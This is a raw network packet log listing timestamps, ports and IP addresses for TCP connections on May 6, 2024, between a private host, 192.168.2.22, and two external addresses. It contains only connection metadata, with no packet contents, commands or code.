May 6, 2024 14:59:16.408902884 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408926964 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408941031 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408952951 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408961058 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.408967018 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408979893 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408988953 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.408992052 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.408992052 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409003019 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409017086 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409027100 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409027100 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409030914 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409044981 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409049034 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409058094 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409070015 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409076929 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409076929 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409090996 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409101009 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409105062 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409118891 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409125090 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409132004 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409143925 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409147024 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409154892 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409162045 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409173012 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409174919 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.409193993 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409193993 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409200907 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.409383059 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571743011 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571768045 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571784019 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571840048 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571882010 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571896076 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571911097 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571924925 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571933031 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571939945 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571947098 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571955919 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571962118 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571974993 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571979046 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.571989059 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.571995020 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572016954 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572030067 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572037935 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572052002 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572063923 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572072983 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572078943 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572086096 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572092056 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572105885 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572113991 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572114944 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572130919 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572132111 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572148085 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572151899 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572160959 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572169065 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572170019 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572181940 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572187901 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572196007 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572202921 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572216988 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572227955 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572236061 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572240114 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572251081 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572254896 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572273016 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572277069 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572287083 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572293043 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572299957 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572303057 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572315931 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572319984 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572333097 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572338104 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572348118 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572350025 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572365046 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572366953 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572381020 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.572391987 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572402954 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572421074 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.572459936 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.611485958 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:16.829956055 CEST	80	49168	109.71.253.25	192.168.2.22
May 6, 2024 14:59:16.830146074 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:16.830488920 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:16.830527067 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:16.830579042 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:16.830868006 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:16.830878973 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.278507948 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.278595924 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.280042887 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.280051947 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.281429052 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.281434059 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.731189966 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.731262922 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.731296062 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.731317043 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.731400967 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.731417894 CEST	443	49171	109.71.253.25	192.168.2.22
May 6, 2024 14:59:17.731430054 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.731460094 CEST	49171	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:17.736639977 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:17.902117014 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:17.902220964 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:18.630040884 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:18.630323887 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:18.630323887 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:18.848980904 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:19.285145998 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.438565969 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.438740015 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.438949108 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.598732948 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598825932 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.598915100 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598931074 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598947048 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598961115 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598974943 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.598987103 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.599000931 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.599014997 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.599030018 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599073887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599320889 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.599320889 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.617269039 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751718044 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751740932 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751759052 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751774073 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751825094 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751842022 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751854897 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751868010 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751882076 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751895905 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751909971 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.751919985 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751919985 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751919985 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751919985 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751952887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751952887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751952887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751952887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.751952887 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752060890 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752074003 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752084970 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752105951 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752110004 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752119064 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752123117 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752135992 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752150059 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752151012 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752163887 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752171993 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752177000 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.752186060 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752211094 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.752223015 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.754292011 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905107975 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905133963 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905183077 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905183077 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905219078 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905234098 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905249119 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905256987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905265093 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905271053 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905278921 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905284882 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905293941 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905303955 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905308008 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905314922 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905328989 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905353069 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905360937 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905375957 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905390978 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905399084 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905410051 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905411959 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905426025 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905450106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905550003 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905565023 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905580044 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905594110 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905596972 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905607939 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905613899 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905625105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905636072 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905639887 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905643940 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905654907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905658007 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905669928 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905678034 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905683994 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905689955 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905698061 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905710936 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905714035 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905720949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905730009 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905739069 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905745983 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905752897 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905760050 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905769110 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905783892 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905797958 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905847073 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905860901 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905874968 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905889988 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905895948 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905913115 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905915976 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905922890 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905930042 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905956984 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905971050 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.905975103 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.905996084 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.906001091 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.906001091 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.906012058 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.906034946 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.906042099 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.907319069 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.907334089 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:19.907376051 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.908551931 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:19.909882069 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058237076 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058259964 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058271885 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058286905 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058285952 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058300018 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058314085 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058320999 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058326960 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058343887 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058356047 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058367968 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058382034 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058397055 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058439970 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058453083 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058465958 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058479071 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058491945 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058514118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058557987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058557987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058557987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058557987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.058557987 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060002089 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060041904 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060044050 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060065031 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060084105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060084105 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060112000 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060117960 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060118914 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060157061 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060169935 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060172081 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060190916 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060194016 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060206890 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060209990 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060230017 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060231924 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060249090 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060255051 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060261011 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060269117 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060290098 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060302019 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060331106 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060343981 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060357094 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060365915 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060372114 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060379982 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060384989 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060393095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060398102 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060406923 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060420990 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060434103 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060444117 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060456991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060470104 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060472965 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060486078 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060492039 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060499907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060508966 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.060513020 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.060528040 CEST	80	49172	104.168.33.34	192.168.2.22
